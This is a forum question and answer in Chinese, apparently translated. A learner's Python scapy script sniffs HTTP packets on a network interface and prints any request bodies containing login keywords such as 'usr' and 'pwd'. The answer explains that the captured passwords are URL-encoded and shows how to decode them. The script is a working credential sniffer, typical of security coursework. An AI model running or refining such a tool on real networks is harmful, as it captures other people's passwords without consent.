嗨,我写了下面的程序,它是嗅探数据包,我可以看到用户名、密码和URL,但当我输入带有特殊字符的密码时,我得到的是这样的"%21",有人能帮帮我吗......
#!/bin/python3
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packets)
def get_url(packet):
if packet.haslayer(http.HTTPRequest):
url = packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
return url
def get_login_info(packet):
if packet.haslayer(http.HTTPRequest):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
#load = str(load)
keybword = ["usr", "uname", "username", "pwd", "pass", "password"]
for eachword in keybword:
if eachword.encode() in load:
return load
def process_sniffed_packets(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request>>" + str(url))
login_info = get_login_info(packet)
if login_info:
print("\n\n[+] Possible username and password >>" + str(login_info) + "\n\n")
sniff("eth0")
root@kali:~python_course_by_zaid# .packet_sniffer.py .
[+] HTTP请求>>b'testing-ground.scraping.prologin?mode=login' 。
[+] 可能的用户名和密码>>b "b'usr=admin&pwd=123456%21%40。
它应该打印123456!@
问题是,密码是 URL编码. 本质上,有些字符不能放到URL中,比如 !和@,所以它们会用%来转义。
如果你在打印这些字符串之前对它们进行 URL 解码,你会得到预期的结果。在Python3中,你可以像这样解码。
# script.py
import urllib.parse
result = urllib.parse.unquote("123456%21%40")
print(result)
运行它我们得到:
$ python script.py
123456!@